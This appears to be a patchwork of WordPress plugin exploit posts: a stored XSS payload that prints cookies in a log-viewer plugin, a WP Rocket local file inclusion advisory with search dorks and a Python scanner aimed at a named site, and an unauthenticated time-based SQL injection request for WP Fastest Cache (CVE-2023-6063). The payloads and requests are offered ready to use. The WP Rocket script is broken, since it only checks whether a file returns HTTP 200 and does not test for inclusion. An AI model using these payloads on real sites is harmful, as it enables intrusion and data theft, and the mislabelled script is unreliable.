$index = array_search( $log, $logs );
update_option( 'server_logs', $logs );
wp_safe_redirect( admin_url('tools.php?page=wp-server-log-viewer&log=' . $index) );
}
====================================[Proof of Concept]====================================
Add new log file to the plugin.
paste this exploit into the form and submit it.
<img src=# onerror=alert(document.cookie);>log.txt
It tries to render an image and triggers the onerror event and prints the cookie. in the tab you see the log.txt
Paulos Yibelo discovered and reported this Local File Inclusion vulnerability in WordPress WP Rocket Plugin. This could allow a malicious actor to include local files of the target website and show its output onto the screen. Files which store credentials, such as database credentials, could potentially allow complete database takeover depending on the configuration. This vulnerability has been fixed in version 2.10.4.
https://patchstack.com/database/vulnerability/wp-rocket/wordpress-wp-rocket-plugin-2-10-3-local-file-inclusion-lfi-vulnerability
https://vulners.com/wpvulndb/WPVDB-ID:5484D821-7017-47A8-90D8-7D87CB5E0E50
Exploit :
#Code By E1.Coders
#Dork : "Powered by WP Rocket" filetype:php intitle:"WP Rocket Configuration" -"in" -"dirlist"
Dork : http://example.com/wp-content/plugins/wp-rocket/inc/functions/min/v2.10.3/min/min.php
import requests
import time
def check_wp_rocket_version(url):
version_url = url + "/wp-rocket/css/rocket.css"
try:
response = requests.get(version_url)
version = response.headers["X-Powered-By"]
if "WP Rocket/" in version:
version = version.split("/")[1]
return version
except Exception as e:
print(f"Error occurred while fetching WP Rocket version: {e}")
return None
def test_wp_rocket_lfi_bug(url):
lfi_url = url + "/wp-rocket/inc/vendor/composer/installed.json"
try:
response = requests.get(lfi_url)
if response.status_code == 200:
return True
except Exception as e:
print(f"Error occurred while testing LFI: {e}")
return False
def main():
url = "http://arvatools.com"
wp_rocket_version = check_wp_rocket_version(url)
if wp_rocket_version:
print(f"WP Rocket Version: {wp_rocket_version}")
if wp_rocket_version in ["2.10.0", "2.10.1", "2.10.2", "2.10.3"]:
result = test_wp_rocket_lfi_bug(url)
if result:
print("LFI vulnerability found in WP Rocket")
else:
print("LFI vulnerability not found in WP Rocket")
else:
print("WP Rocket version is not affected by the LFI bug")
else:
print("Unable to fetch WP Rocket version")
if __name__ == "__main__":
main()
# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2
# Date: 14.11.2023
# Exploit Author: Meryem Taşkın
# Vendor Homepage: https://www.wpfastestcache.com/
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Version: WP Fastest Cache 1.2.2
# Tested on: WP Fastest Cache 1.2.2
# CVE: CVE-2023-6063
## Description
An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.
## Vuln Code
public function is_user_admin(){
global $wpdb;
foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
if(preg_match("/wordpress_logged_in/i", $cookie_key)){
$username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);
break;
}
}
if(isset($username) && $username){
$res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
FROM `$wpdb->users`
INNER JOIN `$wpdb->usermeta`
ON `$wpdb->users`.`user_login` = \"$username\" AND # $username varible is not escaped vulnerable to SQL injection
.....
## Exploit
GET / HTTP/1.1
Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
Host: meryem.local
## Parameter: Cookie #1* ((custom) HEADER)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg
---
## References
- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)
- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)
- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063)
## Credits
- Original Researcher: Alex Sanford
- PoC: Meryem Taşkın